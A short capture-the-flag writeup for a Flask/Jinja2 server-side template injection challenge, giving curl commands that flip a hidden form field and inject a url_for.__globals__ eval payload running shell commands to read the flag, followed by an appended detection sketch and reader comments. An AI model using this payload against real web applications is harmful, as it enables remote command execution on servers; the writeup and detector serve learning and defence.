Rating: 3.0

```
curl 'https://wizardschat.tghack.no/login' --data 'has_magic=1&username={{7*7}}' --compressed -c cookie;curl https://wizardschat.tghack.no/ -b cookie
```
The second request shows the username as rendered by the server.
```
curl 'https://wizardschat.tghack.no/login' --data 'has_magic=1&username={{url_for.__globals__%5B%27__builtins__%27%5D%5B%27eval%27%5D%28%22__import__%28%27os%27%29.popen%28%27cat flag.txt%27%29.read%28%29%22%29}}' --compressed -c cookie;curl https://wizardschat.tghack.no/ -b cookie
```
The response contains the flag.

When we browse to https://wizardschat.tghack.no/login, we find `<input type="hidden" name="has_magic" value="0" />`.
If we POST `has_magic=1&username=anything`, we get a cookie and a new page, and the username is reflected in the response. To test for SSTI, use `{{7*7}}` as the username: the username is then shown as 49.
Final payload: `url_for.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")`

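In python3:
```
from flask import url_for
# url_for is an ordinary Python function, so __globals__ is its module's
# global namespace, which includes __builtins__
url_for.__globals__
```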
You can see the results yourself.

I read a Korean bro's writeup and then wrote this, haha.
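
A detection-side sketch for the requests shown in this writeup, added here as an example and not part of the original writeup or the challenge's code: it inspects form-encoded login bodies for the changed hidden field, template delimiters and dunder names. The function names, the `HIDDEN_DEFAULTS` table and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Jinja2 expression / statement delimiters, and dunder names such as __globals__.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
DUNDER_NAME = re.compile(r"__[A-Za-z]\w*__")
# Assumption: the login form always ships has_magic=0, as in the hidden input above.
HIDDEN_DEFAULTS = {"has_magic": "0"}


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_login_body(body):
    """Return (field, reason) findings for one form-encoded POST body."""
    findings = []
    # parse_qsl performs the first round of percent-decoding itself.
    for field, value in parse_qsl(body, keep_blank_values=True):
        value = fully_decode(value)
        expected = HIDDEN_DEFAULTS.get(field)
        if expected is not None and value != expected:
            findings.append((field, "hidden field differs from form default"))
        if TEMPLATE_EXPR.search(value):
            findings.append((field, "template expression delimiters"))
        if DUNDER_NAME.search(value):
            findings.append((field, "dunder attribute name"))
    return findings


# Constructed sample bodies: the {{7*7}} probe from the writeup, the expression
# from the python3 snippet percent-encoded, a double-encoded probe, a benign login.
SAMPLES = [
    "has_magic=1&username={{7*7}}",
    "has_magic=1&username=%7B%7Burl_for.__globals__%7D%7D",
    "has_magic=0&username=%257B%257B7*7%257D%257D",
    "has_magic=0&username=harry",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", inspect_login_body(body))
```

Pattern matching like this is a detection aid only; the fix on the server side is to pass the username to the template as a variable instead of building template source from it.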

songhana, April 22, 2019, 12:51 p.m.

nice job ?


songhana, April 22, 2019, 12:53 p.m.

nice job XD